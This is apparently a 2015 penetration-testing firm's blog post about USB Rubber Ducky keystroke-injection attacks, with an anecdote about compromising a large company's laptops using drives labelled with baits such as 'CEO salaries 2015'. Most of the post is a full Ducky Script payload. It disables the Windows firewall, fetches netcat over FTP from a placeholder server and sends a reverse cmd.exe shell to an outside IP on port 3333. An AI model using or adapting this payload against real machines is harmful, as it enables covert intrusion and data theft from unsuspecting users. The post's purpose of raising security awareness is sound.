December 23, 2015

Some customers think that the USB threat may have gone away after Windows 7 where autoplay/autorun is disabled by default. While this is true for most standard USB attack vectors it doesn’t apply to USB rubber ducky attacks.

What’s the difference?

The USB rubber ducky attack works different in that respect that it doesn’t execute an exe or similar file, but it emulates an external keyboard which is not flagged as malicious activity or as a virus by AV or endpoint protection. It’s like plugging an external keyboard in but rather then a user typing in the commands, the Rubber Ducky executes a set of commands instead.

The following raw code (prior to compiling) simply connects to an FTP server, downloads Netcat and then proceeds to send a shell to a specified IP and port receiver.

DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open ftp.something.com 21 > ftp.txt
ENTER
DELAY 100
STRING echo user@something.com>> ftp.txt
ENTER
DELAY 100
STRING echo password>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc -nv X.X.X.X 3333 -e cmd.exe
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER

We were recently engaged by a fortune 500 company for a Pentest with sound defenses in place, yet their laptops were compromised that way and a lot of juicy information could be harvested. FireEye, McAfee EPO and all the endpoint defenses they had in place couldn’t stop users plugging in a Rubber Ducky. Especially not when the Rubber Ducky is labeled with┬áCEO salaries 2015, free Amazon Vouchers or free expedia vouchers. 8/10 USBs were plugged in and 8/10 shells were received.

The company has security in place and employees get taught to not plug in unknown devices, but hey….curiosity and the opportunity to gain something free beats any security policy….

For folks interested in the USB rubber ducky, here is the link:
http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe?variant=353378649

Share